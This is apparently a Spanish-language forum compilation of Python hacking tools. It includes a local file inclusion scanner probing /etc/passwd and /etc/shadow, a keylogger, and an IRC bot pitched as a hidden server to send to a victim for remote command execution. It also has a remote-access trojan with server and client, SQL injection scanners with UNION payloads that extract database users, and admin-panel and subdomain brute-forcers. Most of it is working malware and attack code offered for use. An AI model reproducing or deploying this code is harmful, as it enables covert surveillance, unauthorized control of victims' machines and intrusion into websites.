files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']

def header() :
print "\n--== LFI T00l ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def fuzz(web):
print "\n[+] Fuzzing files...\n"
for file in files:
 code = toma(web+file)
 if not (re.findall("No such file or directory in",code)):
  print "[File Found] : ",web,file
 


def test(web):
try:
 print "\n[+] Testing vulnerability LFI in",web
 code = toma(web+"'")
 if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)):
  fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)
  print "\n[+] LFI Detected"
  print "[+] Full Path discloure : ",fpd[0]
  fuzz(web)
 else:
  print "[-] LFI Not Found"
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
test(sys.argv[1])

copyright()


#The End

Ejemplo de uso

Código [Seleccionar] Expandir


python lfi.py http://127.0.0.1/lfi.php?file=


Código [Seleccionar] Expandir


C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=

--== LFI T00l ==--


[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=

[+] LFI Detected
[+] Full Path discloure :  C:\xampp\htdocs\lfi.php

[+] Fuzzing files...



(C) Doddy Hackman 2010



Un simple keylogger en Python

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#Simple Keylogger in Python
#(C) Doddy Hackman 2011

import pyHook,pythoncom


def savefile(name,text):
file = open(name,"a")
file.write(text+"\n")
file.close()

def toma(frase):
savefile("logs.txt",frase.Key)

def capturar():
nave = pyHook.HookManager()
nave.KeyDown = toma
nave.HookKeyboard()
pythoncom.PumpMessages()

while 1:
capturar()

# The End

Hola a todos.

Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo
a una victima para poder controlarla desde un comando canal IRC

El comando clave para mandar comandos que despues se muestra el
resultado de comando en el chat es

Código [Seleccionar] Expandir


cmdnow TUCOMANDO


Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Insane Bot (C) Doddy Hackman 2011
#Version beta 0.00001

import re,socket
import subprocess

host = "127.0.0.1"
canal = "#locos"
nick = "bot"

irc = socket.socket()
try:
irc.connect((host,6667))
irc.send("NICK "+nick+"\r\n")
irc.send("USER "+nick+" 1 1 1 1\r\n")
irc.send("JOIN "+canal+"\r\n")
print "[+] Insane Bot Online\n"
while 1:
 code = irc.recv(9999)
 if re.findall("PING",code):
  irc.send("PONG "+code.split()[1]+"\r\n")
 if re.findall("PRIVMSG",code):
  nick = code.split("!")
  nick = nick[0].replace(":","")
  msg = code.split(":")[2:][0]
  if re.findall("cmdnow",code):
   cmd = code.split("cmdnow")[1]
   irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n")
   rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
   if rea:
    re1 = rea.stdout.read()
    total = re1.replace("\n","|")
    irc.send("PRIVMSG "+canal+" : "+total+"\n")
   else:
    re2 = rea.stderr.read()
    total = re2.replace("\n","|")
    irc.send("PRIVMSG "+canal+" : "+total+"\n")
   
 
except:
print "\n\n[-] Error\n\n"


# The End


Bueno , este es un simple programa en python hecho en tk que permite mandar
peticiones webs a un servidor en concreto

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Console (C) Doddy Hackman 2011

from Tkinter import *
import socket

global x,socket

def execa() :


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((str(host.get()),80))
s.send(cmd.get()+"\r\n")
data = s.recv(666)
s.close()
panel.insert(END,repr(data))

 

window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")

window.maxsize(width="400",height="350")
window.minsize(width="400",height="350")

window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window,width=30,height=15,bg="black",fg="red")

Label(window,bg="black").grid(row=3)

Label(window,text="Host : ",bg="black",fg="red").grid(row=4,column=4)
entry = Entry(window,width=35,textvariable=host,bg="black",fg="red").grid(row=4,column=5)

Label(window,text="Command : ",bg="black",fg="red").grid(row=8,column=4)
entry = Entry(window,width=35,textvariable=cmd,bg="black",fg="red").grid(row=8,column=5)

Button(text="Cargar",bg="black",fg="red",activebackground="red",command=execa).grid(row=8,column=9)


Label(window,bg="black").grid(row=19)
panel.grid(row=20,column=5)


window.mainloop()


Hola , aca traigo un troyano en python con las siguientes
opciones

• Ocultar inicio
  
• Mostrar inicio
  
• Ocultar barra de tereas
  
• Mostrar barra de tareas
  
• Abrir CD
  
• Cerrar CD
  
• Ejecutar comandos
  
• Mostrar informacion
  
  server.py
  
  
  Código (python) [Seleccionar] Expandir
  
#!usr/bin/python
#Hell RAt (C) Doddy Hackman 2011

import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess

print "\n\n[+] Online\n\n"

slave = socket.socket()
slave.bind(("",666))
slave.listen(999)

a,b = slave.accept()

while True:
rex = a.recv(20)
if re.findall("getso",rex):
 z = os.name
 a.send(z)
if re.findall("getpath",rex):
 h = os.getcwd()
 a.send(h)
if re.findall("ocultarinicio",rex):
 x = win32gui.FindWindow("Shell_TrayWnd","")
 win32gui.ShowWindow(x,win32con.SW_HIDE)
elif re.findall("mostrarinicio",rex):
 x = win32gui.FindWindow("Shell_TrayWnd","")
 win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
elif re.findall("ocultaricono",rex):
 x = win32gui.FindWindow(0,"Program Manager")
 win32gui.ShowWindow(x,win32con.SW_HIDE)
elif re.findall("mostraricono",rex):
 x = win32gui.FindWindow(0,"Program Manager")
 win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
elif re.findall("abrircd",rex):
 ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
elif re.findall("cerrarcd",rex):
 ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
else:
 rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
 if re:
  a.send(rea.stdout.read())
 else:
  a.send(rea.stderr.read())


# The End  
  
  cliente.py
  
  
  Código (python) [Seleccionar] Expandir
  
#!usr/bin/python
#HellRat (C) Doddy Hackman 2011

import os,socket,sys

def head():
print "\n\n-- == hELLrAT == --\n\n"

def copyright():
print "\n\n(C) Doddy Hackman 2011\n\n"

def clean():
if sys.platform=="win32":
 os.system("cls")
else:
 os.system("clear")

def men():

try:
 ip = raw_input("[+] IP : ")
 client = socket.socket()
 client.connect((ip,666))
 while True:
  clean()
  print "\n\n[+] Welcome to ",ip,"\n\n"
  print "\n\n[1] Informacion"
  print "[2] CMD"
  print "[3] Abrir CD"
  print "[4] Cerrar CD"
  print "[5] Ocultar iconos"
  print "[6] Mostrar iconos"
  print "[7] Ocultar barra de tareas"
  print "[8] Mostrar barra de tareas"
  print "[9] Cambiar IP"
  print "[10] Salir"
  op = input("\n\n[Opcion] : ")
  if op == 1:
   print "\n\n[+] Informacion\n\n"
   client.send("getso")
   so = client.recv(999)
   client.send("getpath")
   path = client.recv(999)
   print "[+] SO : "+so  
   print "[+] Path : "+path
   raw_input()
  if op == 2:
   cmd = raw_input("\n[CMD] : ")
   client.send(cmd)
   code = client.recv(999)
   print code
   raw_input()
  if op == 3:
   client.send("abrircd")
  if op == 4:
   client.send("cerrarcd")
  if op == 5:
   client.send("ocultaricono")
  if op == 6:
   client.send("mostraricono")
  if op == 7:
   client.send("ocultarinicio")
  if op == 8:
   client.send("mostrarinicio")
  if op == 9:
   men()
  if op == 10:
   client.close()
   copyright()
   raw_input()
   sys.exit(1)
except:
 print "\n\n[-] Error\n\n"
head()
men()

# The End


Bueno , acabo de hacer un scanner de sqli.

Este busca en google paginas con un dork marcado por ustedes
, para despues borrar repetidos y scanear las webs encontradas

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#Google Iny (C) Doddy Hackman 2011


import urllib2,re,os,sys


def head():
print "\n\n -- == Google Iny == --\n"

def copyright():
print "\n(C) Doddy Hackman 2011\n"
sys.exit(1)


def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()


def show():
print "\n[+] Sintax : ",sys.argv[0]," <dork> <count>\n"

def limpiar(pag):

limpia = []
for p in pag:
 if not (re.findall("http://www.google.com.ar",p,re.I)):
  if p not in limpia:
   limpia.append(p)
return limpia


def sql(webs):
for web in webs :
 if re.findall("=",web):
  web = re.split("=",web)
  web = web[0]+"="
  try:
   code = toma(web+"-1+union+select+1--")
   if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
    print "[SQLI] : ",web,"\n"
  except:
   pass

def scan(dork,count):
pag = []
s = 10  
while s <= int(count):
 try:
  code = toma("http://www.google.com.ar/search?hl=&q="+str(dork)+"&start="+repr(s))
  d = re.findall("(?<=\"r\"><. href=\")[^\"]+",code)
  s += 10
  for a in d:
   pag.append(a)
 except:
  copyright()
pag = limpiar(pag)

return pag

head()

if len(sys.argv) != 3:
show()
else :
print "\n[+] SQL Scan Started\n"
print "[+] Dork : ",sys.argv[1]
print "[+] Count : ",sys.argv[2]
pages = scan(sys.argv[1],sys.argv[2])
print "\n[+] Webs Found : ",len(pages),"\n"
sql(pages)

copyright()


Hola a todos.

Aca les dejo un simple buscador de dns , solo ponen el dominio y esta cosita se encarga de buscarlas.

Código (python) [Seleccionar] Expandir

#!usr/bin/python
#LFI T00l (C) Doddy Hackman

import os,sys,urllib2,re

dns = ['www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc']

def header() :
print "\n--== Fuzz DNS ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()


def search(web):
print "\n[+] Searching DNS in",web,"\n"
try:
 for d in dns:
  toma("http://"+d+"."+web)
  print "[DNS Link] : http://"+d+"."+web
except:
 pass

header()

if len(sys.argv) != 2 :
show()

else :
search(sys.argv[1])

copyright()


#The End


Ejemplo de uso

Código [Seleccionar] Expandir


C:/Users/dODDYh/Desktop/Arsenal X parte 2>fuzzdns.py google.com


--== Fuzz DNS ==--


[+] Searching DNS in google.com

[DNS Link] : http://www.google.com

(C) Doddy Hackman 2010



Hola

Aca traigo un simple cliente FTP

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#FTP Manager 0.2 (C) Doddy Hackman 20111

from ftplib import FTP
import sys


def head():
print "\n -- == FTP Manger == --\n\n"

def copyright():
print "\n\n(C) Doddy Hackman 2011\n"
sys.exit(1)

def show():
print "\nSintax : "+sys.argv[0]+" <host> <user> <pass>\n"

def menu():
print "\n"
print "1 : dir"
print "2 : cwd"
print "3 : chdir"
print "4 : delete dir"
print "5 : delete file"
print "6 : rename file"
print "7 : make directory"
print "8 : size"
print "9 : abort\n\n"
op = input("[Option] : ")
return op


def enter(host,user,password):
print "[+] Connecting to ",host,"\n"
enter = FTP(host,user,password)
print "\n[+] Enter in the system\n"

def menu2():
 op = menu()
 if op == 1:
  try:
   lista = enter.dir()
   for a in lista:
    print a
   menu2()
  except:
   menu2()
 elif op == 2:
  try:
   print "\n\n[+] Path : "+enter.pwd()+"\n\n"
   menu2()
  except:
   menu2()
 elif op == 3:
  try:
   dir = raw_input("\n\n[Directory] : ")
   enter.cwd(dir)
   print "\n\n[+] Directory Changed\n\n"
   menu2()
  except:
   menu2()
 elif op == 4:
  try:
   dir = raw_input("\n\n[Directory] : ")
   enter.rmd(dir)
   print "\n\n[+] Directory Deleted\n\n"
   menu2()
  except:
   menu2()
 elif op == 5:
  try:
   file = raw_input("\n\n[File] : ")
   enter.delete(file)
   print "\n\n[+] File Deleted\n\n"
   menu2()
  except:
   menu2()
 elif op == 6:
  try:
   oldfile = raw_input("\n\n[Name] : ")
   newfile = raw_input("\n[New Name] : ")
   enter.rename(oldfile,newfile)
   print "\n\n[+] Name Changed\n\n"
   menu2()
  except:
   menu2()
 elif op == 7:
  try:
   dir = raw_input("\n\n[New Directory] : ")
   enter.mkd(dir)
   print "\n\n[+] Directory Created\n\n"
   menu2()
  except:
   menu2()
 elif op == 8:
  try:
   file = raw_input("\n\n[File] : ")
   peso = enter.size(file)
   print "\n\n[+] ",peso," KB \n\n"
   menu2()
  except:
   menu2()
 elif op == 9:
  enter.quit()
  copyright()
 
 else:
  menu2()      
menu2()



head()

if len(sys.argv) != 4:
show()
else:
enter(sys.argv[1],sys.argv[2],sys.argv[3])

copyright()


Hola a todos.

Hoy termine un script en python para buscar el famoso panel de administraction

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#Finder Admin (C) Doddy Hackman

import sys,httplib,os

os.system("cls")

panels=['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']

def header() :
print "\n--== Finder Admin ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
exit(1)

header()

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web,path):
nave = httplib.HTTPConnection(web)
nave.request("GET","/"+path)
return nave.getresponse().status

def buscar(web):
print "\n[+] Target : ",web,"\n\n"
for path in panels:
 try:
  code = toma(web,path)
  if code ==200:
   print "[Link] : "+web+"/"+path
 except(KeyboardInterrupt):
  copyright()
 except:
  pass

if len(sys.argv) != 2 :
show()

else:
buscar(sys.argv[1])

copyright()


#The End

Un ejemplo de uso seria

Código [Seleccionar] Expandir


python finder.py 127.0.0.1


Código [Seleccionar] Expandir


--== Finder Admin ==--


[+] Target :  127.0.0.1


[Link] : 127.0.0.1/admin/
[Link] : 127.0.0.1/login.php
[Link] : 127.0.0.1/phpmyadmin/


(C) Doddy Hackman 2010


Eso si no usen http:// en la web que quieran escanear , ejemplo www.google.com.ar

Bueno esta es la primera version de este simple programa que hice en perl , en
la siguiente version le agregare otras cosas y podra scanear varios en un archivo de texto.

Esta cosa busca:

* Vulnerabilidad (obvio)
* Limite de columnas
* Informacion sobre la base de datos
* Automaticamente buscar el numero que permite mostrar informacion
* Verifica existencia de mysql.user y information.schema.tables

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#Easy Inyector (C) Doddy Hackman 2010

import os,sys,urllib2,re


def clean():
if sys.platform=="win32":
 os.system("cls")
else:
 os.system("clear")


def header() :
print "\n--== Easy Inyector ==--\n"

def copyright() :
print "\n\n(C) Doddy Hackman 2010\n"
sys.exit(1)

def show() :
print "\n[*] Sintax : ",sys.argv[0]," <web>\n"

def toma(web) :
return urllib2.urlopen(web).read()

def bypass(bypass):
if bypass == "--":
 return("+","--")
elif bypass == "/*":
 return("/**/","/*")
else:
 return("+","--")

def more(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Searching more data\n"
web1 = re.sub("hackman","concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)",web)
code0 = toma(web1)
if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)):
 datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)
 datar = re.split("K0BRA",datax[0])
 print "[+] Username :",datar[1]
 print "[+] Database :",datar[2]
 print "[+] Version :",datar[3],"\n"
code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
if (re.findall("K0BRA",code1)):
  print "[+] mysql.user : on"
code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
if (re.findall("K0BRA",code2)):
  print "[+] information_schema.tables : on"

def findlength(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Finding columns length"
number = "concat(0x4b30425241,1,0x4b30425241)"
for te in range(2,30):
 number = str(number)+","+"concat(0x4b30425241,"+str(te)+",0x4b30425241)"
 code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2)
 if (re.findall("K0BRA(.*?)K0BRA",code)):
  numbers = re.findall("K0BRA(.*?)K0BRA",code)
  print "[+] Column length :",te
  print "[+] Numbers",numbers,"print data"
  sql = ""
  tex = te + 1
  for sqlix in range(2,tex):
   sql = str(sql)+","+str(sqlix)
   sqli  = str(1)+sql
  sqla = re.sub(numbers[0],"hackman",sqli)
  more(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx)
  print "\n[+] Scan Finished\n"
  sys.exit(1)
print "[-] Length dont found\n"
 
   
def scan(web,passx):
pass1,pass2 = bypass(passx)
print "\n[+] Testing vulnerability"
code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2)
if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
 print "[+] SQLI Detected"
 findlength(web,passx)
else:
 print "[-] Not Vulnerable"
 copyright()


header()

if len(sys.argv) != 2 :
show()

else :
try:
 scan(sys.argv[1],"--")
except:
 copyright()


#The End




Ejemplo de uso

Código [Seleccionar] Expandir



C:/Users/DoddyH/Desktop/Arsenal X parte 2>sqli.py http://127.0.0.1/sql.php?id=


--== Easy Inyector ==--


[+] Testing vulnerability
[+] SQLI Detected

[+] Finding columns length
[+] Column length : 3
[+] Numbers ['1', '2', '3'] print data

[+] Searching more data

[+] Username : root@localhost
[+] Database : hackman
[+] Version : 5.1.41

[+] mysql.user : on
[+] information_schema.tables : on

[+] Scan Finished



(C) Doddy Hackman 2010